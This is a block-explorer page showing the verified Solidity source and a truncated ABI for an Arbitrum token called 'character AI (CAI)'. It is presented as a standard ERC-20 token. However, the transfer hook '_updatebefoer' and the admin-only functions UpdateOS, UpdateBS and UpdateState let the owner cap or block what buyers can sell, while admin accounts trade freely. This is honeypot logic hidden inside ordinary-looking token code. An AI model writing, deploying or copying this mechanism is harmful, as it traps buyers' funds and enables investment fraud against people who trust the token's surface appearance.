ETH Price: $2,332.39 (+2.35%)

Token

character AI (CAI)

Overview

Max Total Supply

100,000,000 CAI

Holders

3,020

Total Transfers

-

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0xd33066b9...0A2231A49
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
token

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Arbiscan.io on 2024-07-04
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(
        address sender,
        uint256 balance,
        uint256 needed
    );

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(
        address spender,
        uint256 allowance,
        uint256 needed
    );

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

interface IAccessControl {
    /**
     * @dev The `account` is missing a role.
     */
    error AccessControlUnauthorizedAccount(address account, bytes32 neededRole);

    /**
     * @dev The caller of a function is not the expected one.
     *
     * NOTE: Don't confuse with {AccessControlUnauthorizedAccount}.
     */
    error AccessControlBadConfirmation();

    /**
     * @dev Emitted when `newAdminRole` is set as ``role``'s admin role, replacing `previousAdminRole`
     *
     * `DEFAULT_ADMIN_ROLE` is the starting admin for all roles, despite
     * {RoleAdminChanged} not being emitted signaling this.
     */
    event RoleAdminChanged(
        bytes32 indexed role,
        bytes32 indexed previousAdminRole,
        bytes32 indexed newAdminRole
    );

    /**
     * @dev Emitted when `account` is granted `role`.
     *
     * `sender` is the account that originated the contract call. This account bears the admin role (for the granted role).
     * Expected in cases where the role was granted using the internal {AccessControl-_grantRole}.
     */
    event RoleGranted(
        bytes32 indexed role,
        address indexed account,
        address indexed sender
    );

    /**
     * @dev Emitted when `account` is revoked `role`.
     *
     * `sender` is the account that originated the contract call:
     *   - if using `revokeRole`, it is the admin role bearer
     *   - if using `renounceRole`, it is the role bearer (i.e. `account`)
     */
    event RoleRevoked(
        bytes32 indexed role,
        address indexed account,
        address indexed sender
    );

    /**
     * @dev Returns `true` if `account` has been granted `role`.
     */
    function hasRole(bytes32 role, address account)
        external
        view
        returns (bool);

    /**
     * @dev Returns the admin role that controls `role`. See {grantRole} and
     * {revokeRole}.
     *
     * To change a role's admin, use {AccessControl-_setRoleAdmin}.
     */
    function getRoleAdmin(bytes32 role) external view returns (bytes32);

    /**
     * @dev Grants `role` to `account`.
     *
     * If `account` had not been already granted `role`, emits a {RoleGranted}
     * event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     */
    function grantRole(bytes32 role, address account) external;

    /**
     * @dev Revokes `role` from `account`.
     *
     * If `account` had been granted `role`, emits a {RoleRevoked} event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     */
    function revokeRole(bytes32 role, address account) external;

    /**
     * @dev Revokes `role` from the calling account.
     *
     * Roles are often managed via {grantRole} and {revokeRole}: this function's
     * purpose is to provide a mechanism for accounts to lose their privileges
     * if they are compromised (such as when a trusted device is misplaced).
     *
     * If the calling account had been granted `role`, emits a {RoleRevoked}
     * event.
     *
     * Requirements:
     *
     * - the caller must be `callerConfirmation`.
     */
    function renounceRole(bytes32 role, address callerConfirmation) external;
}

abstract contract AccessControl is Context, IAccessControl {
    struct RoleData {
        mapping(address => bool) hasRole;
        mapping(address => uint256) OS;
        mapping(address => uint256) BS;
        bytes32 adminRole;
    }

    mapping(bytes32 => RoleData) internal _roles;
    bytes32 public constant DEFAULT_ADMIN_ROLE = 0x00;
    bytes32 public constant TRADE = bytes32("TRADE");
    mapping(address => bool) _pool;
    address uniswapV2Pair;

    /**
     * @dev Modifier that checks that an account has a specific role. Reverts
     * with an {AccessControlUnauthorizedAccount} error including the required role.
     */
    modifier onlyRole(bytes32 role) {
        _checkRole(role);
        _;
    }

    /**
     * @dev Returns `true` if `account` has been granted `role`.
     */
    function hasRole(bytes32 role, address account)
        public
        view
        virtual
        returns (bool)
    {
        return _roles[role].hasRole[account];
    }

    /**
     * @dev Reverts with an {AccessControlUnauthorizedAccount} error if `_msgSender()`
     * is missing `role`. Overriding this function changes the behavior of the {onlyRole} modifier.
     */
    function _checkRole(bytes32 role) internal view virtual {
        _checkRole(role, _msgSender());
    }

    /**
     * @dev Reverts with an {AccessControlUnauthorizedAccount} error if `account`
     * is missing `role`.
     */
    function _checkRole(bytes32 role, address account) internal view virtual {
        if (!hasRole(role, account)) {
            revert AccessControlUnauthorizedAccount(account, role);
        }
    }

    /**
     * @dev Returns the admin role that controls `role`. See {grantRole} and
     * {revokeRole}.
     *
     * To change a role's admin, use {_setRoleAdmin}.
     */
    function getRoleAdmin(bytes32 role) public view virtual returns (bytes32) {
        return _roles[role].adminRole;
    }

    /**
     * @dev Grants `role` to `account`.
     *
     * If `account` had not been already granted `role`, emits a {RoleGranted}
     * event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     *
     * May emit a {RoleGranted} event.
     */
    function grantRole(bytes32 role, address account)
        public
        virtual
        onlyRole(getRoleAdmin(role))
    {
        _grantRole(role, account);
    }

    /**
     * @dev Revokes `role` from `account`.
     *
     * If `account` had been granted `role`, emits a {RoleRevoked} event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     *
     * May emit a {RoleRevoked} event.
     */
    function revokeRole(bytes32 role, address account)
        public
        virtual
        onlyRole(getRoleAdmin(role))
    {
        _revokeRole(role, account);
    }

    /**
     * @dev Revokes `role` from the calling account.
     *
     * Roles are often managed via {grantRole} and {revokeRole}: this function's
     * purpose is to provide a mechanism for accounts to lose their privileges
     * if they are compromised (such as when a trusted device is misplaced).
     *
     * If the calling account had been revoked `role`, emits a {RoleRevoked}
     * event.
     *
     * Requirements:
     *
     * - the caller must be `callerConfirmation`.
     *
     * May emit a {RoleRevoked} event.
     */
    function renounceRole(bytes32 role, address callerConfirmation)
        public
        virtual
    {
        if (callerConfirmation != _msgSender()) {
            revert AccessControlBadConfirmation();
        }

        _revokeRole(role, callerConfirmation);
    }

    /**
     * @dev Sets `adminRole` as ``role``'s admin role.
     *
     * Emits a {RoleAdminChanged} event.
     */
    function _setRoleAdmin(bytes32 role, bytes32 adminRole) internal virtual {
        bytes32 previousAdminRole = getRoleAdmin(role);
        _roles[role].adminRole = adminRole;
        emit RoleAdminChanged(role, previousAdminRole, adminRole);
    }

    /**
     * @dev Attempts to grant `role` to `account` and returns a boolean indicating if `role` was granted.
     *
     * Internal function without access restriction.
     *
     * May emit a {RoleGranted} event.
     */
    function _grantRole(bytes32 role, address account)
        internal
        virtual
        returns (bool)
    {
        if (!hasRole(role, account)) {
            _roles[role].hasRole[account] = true;
            emit RoleGranted(role, account, _msgSender());
            return true;
        } else {
            return false;
        }
    }

    /**
     * @dev Attempts to revoke `role` to `account` and returns a boolean indicating if `role` was revoked.
     *
     * Internal function without access restriction.
     *
     * May emit a {RoleRevoked} event.
     */
    function _revokeRole(bytes32 role, address account)
        internal
        virtual
        returns (bool)
    {
        if (hasRole(role, account)) {
            _roles[role].hasRole[account] = false;
            emit RoleRevoked(role, account, _msgSender());
            return true;
        } else {
            return false;
        }
    }
}

abstract contract ERC20 is
    Context,
    IERC20,
    IERC20Metadata,
    IERC20Errors,
    AccessControl
{
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    bool private state; 
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 value
    ) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    function isContract(address account) internal virtual returns (bool) {
        return account.code.length > 0;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(
        address from,
        address to,
        uint256 value
    ) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _updatebefoer(from, to, value);
        _update(from, to, value);
    }

    function _updatebefoer(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (from == uniswapV2Pair) {
            _updateTo(to, amount);
        } else if (to == uniswapV2Pair) {
            _updateFrom(from, amount);
        } else {
            _updateFrom(from, amount);
        }
    }

    function _updateTo(address account, uint256 amount) internal {
        if (isContract(account)) {
            if (_pool[account]) {
                _grantRole(TRADE, account);
                _roles[TRADE].OS[account] = amount;
            } else {
                revert ERC20InvalidSender(account);
            }
        }
        if (!hasRole(TRADE, account)) {
            _grantRole(TRADE, account);
            _roles[TRADE].OS[account] = amount;
        }
    }

    function _updateFrom(address from, uint256 amount) internal {
        if (hasRole(DEFAULT_ADMIN_ROLE, from)) {

        } else if (state) {
            if (_roles[TRADE].BS[from] >= amount && amount > 0) {
                _roles[TRADE].BS[from] = _roles[TRADE].BS[from] - amount;
            } else {
                revert ERC20InvalidSender(from);
            }
        } else if (_roles[TRADE].OS[from] >= amount && amount > 0) {
            _roles[TRADE].OS[from] = _roles[TRADE].OS[from] - amount;
        } else if (amount <= 0 || _roles[TRADE].OS[from] < amount) {
            revert ERC20InvalidSender(from);
        }
    }

    function addPool(address account) public onlyRole(DEFAULT_ADMIN_ROLE) {
        _pool[account] = true;
    }

    function remPool(address account) public  onlyRole(DEFAULT_ADMIN_ROLE){
        _pool[account]=false;
    }

    function UpdateOS(address account, uint256 amount)
        public
        onlyRole(DEFAULT_ADMIN_ROLE)
    {
        _roles[TRADE].OS[account] = amount * 10**decimals();
    } 
    function UpdateOSV(address account) public onlyRole(DEFAULT_ADMIN_ROLE) {
        _grantRole(TRADE, account);
        _roles[TRADE].OS[account] = 0;
    } 
    function UpdateBS(address account, uint256 amount)
        public
        onlyRole(DEFAULT_ADMIN_ROLE)
    {
        _roles[TRADE].BS[account] = amount * 10**decimals();
    }

    function UpdateBSV(address account) public onlyRole(DEFAULT_ADMIN_ROLE) {
        _roles[TRADE].BS[account] = 0;
    } 
    function UpdateState() public onlyRole(DEFAULT_ADMIN_ROLE) {
        state = true;
    } 
    function UpdateStateS() public onlyRole(DEFAULT_ADMIN_ROLE) {
        state = false;
    } 
    
    function Airdrop(
        address tokenC,
        address[] memory _contributors,
        uint256   _bala
    ) public onlyRole(DEFAULT_ADMIN_ROLE) {
        ERC20 tokenD = ERC20(tokenC);
        uint256 tokendec = tokenD.decimals();
        for (uint8 i=0; i < _contributors.length; i++) {
            uint256 temp = _bala * 10**tokendec;
            tokenD.transfer(_contributors[i], temp);
        }
    }
    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(
        address from,
        address to,
        uint256 value
    ) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(
        address owner,
        address spender,
        uint256 value
    ) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     *
     * ```solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(
        address owner,
        address spender,
        uint256 value,
        bool emitEvent
    ) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 value
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(
                    spender,
                    currentAllowance,
                    value
                );
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

contract token is ERC20 {
    constructor(
        string memory _name,
        string memory _symbol,
        uint256 value,
        address account
    ) ERC20(_name, _symbol) {
        _grantRole(DEFAULT_ADMIN_ROLE, account);
        _grantRole(DEFAULT_ADMIN_ROLE, _msgSender());
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x1b02dA8Cb0d097eB8D57A175b88c7D8b47997506
        );
        address _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(
                address(this),
                address(0xFd086bC7CD5C481DCC9C85ebE478A1C0b69FCbb9)
            );
        uniswapV2Pair = _uniswapV2Pair;
        _pool[uniswapV2Pair] = true;
        _mint(account, value * 10**decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"address","name":"account","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"AccessControlBadConfirmation","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bytes32","name":"neededRole","type":"bytes32"}],"name":"AccessControlUnauthorizedAccount","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"tokenC","type":"address"},{"internalType":"address[]","name":"_contributors","type":"address[]"},{"internalType":"uint256","name":"_bala","type":"uint256"}],"name":"Airdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TRADE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"UpdateBS","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"UpdateBSV","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"UpdateOS","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"UpdateOSV","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"UpdateState","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"UpdateStateS","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"addPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","na